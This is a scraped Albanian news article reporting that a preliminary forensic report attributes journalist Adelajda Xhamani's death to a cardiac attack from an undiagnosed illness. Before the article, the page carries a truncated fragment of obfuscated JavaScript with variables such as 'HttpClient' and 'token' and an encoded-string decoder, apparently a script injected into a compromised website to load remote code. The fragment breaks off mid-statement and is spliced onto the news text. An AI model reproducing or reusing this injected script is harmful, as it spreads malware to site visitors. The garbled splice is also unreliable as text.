;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Raporti Mjekësor zbulon arsyen e vdekjes: Adela s’e dinte që kishte këtë sëmundje!

By

Tre ditë pas ndarjes tragjike nga jeta të gazetares Adelajda Xhamani, është zbardhur raporti paraprak i mjekësisë-ligjore, që ka hedhur dritë mbi shkaqet e vdekjes së saj.

Sipas mjekëve ligjorë, një atak kardiak nga një sëmundje e padiagnostikuar është shkak i ndarjes së saj nga jeta në mënyrë të parakohshme.

“Nga autopsia dhe ekspertiza paraprake nuk hasëm ndonjë komplikacion që varion nga epilepsia. Mendojmë se ajo mund të ketë pasur probleme të tjera shëndetësore, si luhatjet e tensionit, anemia, leucemia, apo të tjera shqetësime, për të cilat ajo nuk kishte dijeni”, kanë deklaruar për gazetën ‘Panorama’ burime nga mjekësia ligjore.

Gjithashtu, të njëjtat burime kanë bërë me dije se në trupin e 31-vjeçares, nuk është konstatuar bllokim i rrugëve të frymëmarrjes, injeksione, shenja dhune apo të përdorimit të alkoolit. Shkaku i saktë i vdekjes së Adelajda Xhamanit do të përcaktohet në raportin përfundimtar, analizat e së cilit kërkojnë 2 deri në 3 javë kohë. /Prive.al

Artikuj të ngjashëm